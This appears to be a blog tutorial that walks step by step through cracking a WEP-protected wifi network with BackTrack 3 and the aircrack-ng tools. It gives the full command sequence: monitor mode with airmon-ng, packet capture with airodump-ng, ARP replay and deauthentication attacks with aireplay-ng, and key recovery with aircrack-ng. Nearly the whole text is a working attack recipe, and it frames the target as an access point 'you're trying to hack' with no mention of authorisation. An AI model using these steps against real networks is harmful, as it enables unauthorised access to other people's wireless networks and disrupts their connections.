The first thing we are going to do is install BackTrack 3 onto an SD card so we can boot from the SD card without having to mess up our currently installed OS. I am not going to go into the details of how to do that here, as it is readily available all over the internet. Here is the article I followed. Apparently the article which I followed has been taken down, but a quick google search should find another.
After you have booted into BackTrack 3, we are ready for the fun part. The first thing we will do is shutdown our wifi card. In the terminal:
ifconfig ath0 down
Next we want to bring it back up, but in monitor mode:
airmon-ng start wifi0
You should see that a new interface called ath1 was created. That is the interface we are going to use for the rest of our cracking. Next:
airodump-ng ath1
This will list all of the wifi signals your card is picking up. There are two things you are going to want to write down: the BSSID and the Channel (CH), and also make sure the Encryption (ENC) is WEP. Or, if you don’t want to write thpre down, just open a new shell and leave that one open.
Now press
ctrl+c
to stop airodump-ng. Open a new console (if you haven’t already) and type:
airodump-ng --channel x --bssid y -w filename ath1
Where x and y are the channel and bssid that you wrote down, respectively, and filename is whatever you want the prefix of the output files to be. I usually set the filename to something along the lines of the router name, that way when I’m searching through my cracked WEP files I know whats what.
Now leave that running and open another shell. Type
ifconfig
next to
ath1
write down the first 6 sets of numbers in the long string next to HWaddr, replacing the dashes with colons (e.g. 00:11:22:33:44:55). That is your computer’s MAC address, whereas the bssid is the Access Point’s MAC address that you’re trying to hack.
Okay, now in the same window that you typed
ifconfig
, type:
aireplay-ng --arpreplay -b [Access Point's MAC] -h [Your MAC] ath1
Now leave that running and open yet another shell, and type:
aireplay-ng --deauth 5 -c [Your Mac] -a [Access Point's MAC] ath1
Now in that same window type:
aircrack-ng filename*.cap
Where filename is whatever you entered earlier. And there you go! You should now have the WEP key. Leave feedback in the comments. I would love to answer your questions if any arrise.
